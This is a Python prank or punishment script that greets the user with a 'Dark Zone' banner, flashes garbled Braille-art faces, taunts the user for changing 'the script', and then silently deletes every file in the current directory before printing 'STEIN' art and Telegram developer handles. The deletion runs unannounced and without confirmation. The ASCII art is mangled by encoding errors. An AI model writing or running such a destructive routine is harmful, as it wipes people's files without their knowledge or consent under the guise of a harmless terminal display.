import time
import os
import sys
import pyfiglet
from colorama import Fore, init

# Initialize colorama
init(autoreset=True)

def clear_screen():
    os.system('cls' if os.name == 'nt' else 'clear')

def slow_print(text, delay=0.1):
    """Print text one character at a time."""
    for char in text:
        sys.stdout.write(char)
        sys.stdout.flush()
        time.sleep(delay)
    print()

def delete_all_files():
    """Delete all files in the current directory."""
    for filename in os.listdir('.'):
        if os.path.isfile(filename):
            os.remove(filename)

def main():
    # Print welcome message in blue to purple
    print(Fore.BLUE + "Hey WELCOME TO DARK ZONE")
    time.sleep(2)

    # Start switching between text1 and text2
    start_time = time.time()
    while time.time() - start_time < 4:
        # Print text1
        print(Fore.BLUE + """
â£¿â£¿â£¿â£¿â£¿â£¿â¡Ÿâ â „â „â „â „â£ â£¤â£´â£¶â£¶â£¶â£¶â£¤â¡€â ˆâ ™â¢¿â£¿â£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â¡Ÿâ „â „â „â „â „â£¸â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£†â „â ˆâ£¿â£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â â „â „â „â¢€â£´â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£¿â „â „â¢ºâ£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â¡„â „â „â „â ™â »â ¿â£¿â£¿â£¿â£¿â ¿â ¿â ›â ›â »â£¿â¡„â „â£¾â£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â¡‡â „â „â  ðŸ‘ï¸ â „â¢¹â£¿â¡—â „ ðŸ‘ï¸ â¢„â¡€â£¾â¢€â£¿â£¿â£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â¡‡â ˜â „â „â „â¢€â¡€â „â£¿â£¿â£·â£¤â£¤â£¾â£¿â£¿â£¿â£§â¢¸â£¿â£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â¡‡â „â£°â£¿â¡¿â Ÿâ ƒâ „â£¿â£¿â£¿â£¿â£¿â¡›â ¿â¢¿â£¿â£·â£¾â£¿â£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â£¿â¡„â ˆâ â „â „â „â „â »â ¿â¢›â£¿â£¿â ¿â ‚â „â¢¹â¢¹â£¿â£¿â£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â£¿â£¿â¡â â „â „â£ â£€â£€â£šâ£¯â£µâ£¶â †â£°â „â žâ£¾â£¿â£¿â£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â£¿â£¿â£·â¡„â „â „â ˆâ ›â ¿â ¿â ¿â£»â¡â¢ â£¿â£Žâ£¾â£¿â£¿â£¿â£¿â£¿â£¿â£¿
â£¿â£¿â£¿â£¿â£¿â£¿â¡¿â Ÿâ ›â „â „â „â „â „â ™â£›â£¿â£¿â£µâ£¿â¡¿â¢¹â¡Ÿâ£¿â£¿â£¿â£¿â£¿
""")
        time.sleep(0.1)
        clear_screen()
        
        # Print text2
        print(Fore.GREEN + """
â €â €â €â €â €â €â¢ â£¾â£»â£»â£»â£»â Ÿâ ›â ‹â ‰â ‰â ‰â ‰â ›â¢¿â£·â£¦â¡€â €â €â €â €â €
â €â €â €â €â €â¢ â£»â£»â£»â£»â£»â ‡â €â €â €â €â €â €â €â €â €â ¹â£»â£·â €â €â €â €â €
â €â €â €â €â €â£¾â£»â£»â£»â¡¿â ‹â €â €â €â €â €â €â €â €â €â €â €â£»â£»â¡…â €â €â €â €
â €â €â €â €â €â¢»â£»â£»â£»â£¦â£„â£€â €â €â €â €â£€â£€â£¤â£¤â£„â €â¢»â£»â â €â €â €â €
â €â €â €â €â €â¢¸â£»â£»â£¾ ðŸ‘ï¸ â£»â¡†â €â¢¨â£» ðŸ‘ï¸ â¡»â¢¿â â¡¿â €â €â €â €â €â €
â €â €â €â €â €â¢¸â£§â£»â£»â£»â¡¿â¢¿â£»â €â €â ˆâ ›â ›â â €â €â €â ˜â¡‡â €â €â €â €â €
â €â €â €â €â €â¢¸â£»â â €â¢€â£ â£¼â£»â €â €â €â €â €â¢¤â£€â¡€â €â ˆâ â €â €â €â €â €
â €â €â €â €â €â €â¢»â£·â£¾â£»â£»â£»â£»â£„â£€â¡¤â €â €â£€â£½â£»â¡†â¡†â €â €â €â €â €â €
â €â €â €â €â €â €â €â¢¯â£¯â£»â£»â Ÿâ ¿â ¿â ¥â â Šâ ‰â£¹â â£»â£¡â â €â €â €â €â €â €
â €â €â €â €â €â €â €â ˆâ¢»â£»â£»â£·â£¤â£€â£€â£€â „â¢°â¡Ÿâ €â ±â â €â €â €â €â €â €â €
â €â €â €â €â €â €â¢€â£ â£¤â£»â£»â£»â£»â£¦â ¤â €â €â Šâ €â¢€â¡†â¢ â €â €â €â €â €
""")
        time.sleep(0.1)
        clear_screen()

    # Print message after 4 seconds, alphabet by alphabet
    slow_print("Why you Tried to change the script? You know it don't work when you change things brother.\n")

    # Slow print alphabet by alphabet
    slow_print("I hope you understand things now?\n")

    # Delete all files in the directory
    delete_all_files()

    # Print "STEIN" using pyfiglet and colorama
    stein_art = pyfiglet.figlet_format("STEIN")
    print(Fore.RED + stein_art)

    # Additional information using colorama
    additional_info1 = "DEVELOPER : @demonpis TELEGRAM"
    additional_info2 = "CHANNEL: @kyixo TELEGRAM"
    print(Fore.BLUE + additional_info1)
    print(Fore.BLUE + additional_info2)

    time.sleep(4)

if __name__ == "__main__":
    main()
